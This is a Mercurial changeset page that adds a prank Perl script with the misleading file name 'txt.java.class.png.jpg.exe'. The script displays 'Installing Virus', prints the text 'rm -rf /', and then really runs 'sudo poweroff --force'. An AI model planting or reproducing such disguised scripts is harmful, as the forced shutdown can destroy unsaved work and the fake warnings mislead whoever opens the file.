Mercurial > crack
changeset 0:fd13a79adf94
added a program that chris calabrese and I worked on one bored day in front of winston's office
author | Robert McIntyre <rlm@mit.edu> |
---|---|
date | Tue, 18 Oct 2011 00:14:38 -0700 |
parents | |
children | c39acc63d2fa |
files | readme.txt txt.java.class.png.jpg.exe |
diffstat | 2 files changed, 28 insertions(+), 0 deletions(-) [+] |
line wrap: on
line diff
1.1 --- /dev/null Thu Jan 01 00:00:00 1970 +0000 1.2 +++ b/readme.txt Tue Oct 18 00:14:38 2011 -0700 1.3 @@ -0,0 +1,3 @@ 1.4 +these are programs that serve no purpose but amusement 1.5 +they are "on crack" in that they do insane things. 1.6 +enjoy.
2.1 --- /dev/null Thu Jan 01 00:00:00 1970 +0000 2.2 +++ b/txt.java.class.png.jpg.exe Tue Oct 18 00:14:38 2011 -0700 2.3 @@ -0,0 +1,25 @@ 2.4 +#!/usr/bin/perl 2.5 + 2.6 +$| = 1; 2.7 +print "Installing Virus"; 2.8 + 2.9 +dot(); 2.10 +dot(); 2.11 +dot(); 2.12 +print "\n"; 2.13 + 2.14 +print "rm -rf /\n"; 2.15 +sleep 4; 2.16 +`sudo poweroff --force`; 2.17 + 2.18 + 2.19 + 2.20 + 2.21 +sub dot { 2.22 + sleep(1); 2.23 + print "."; 2.24 +} 2.25 + 2.26 + 2.27 + 2.28 +"molgasoft"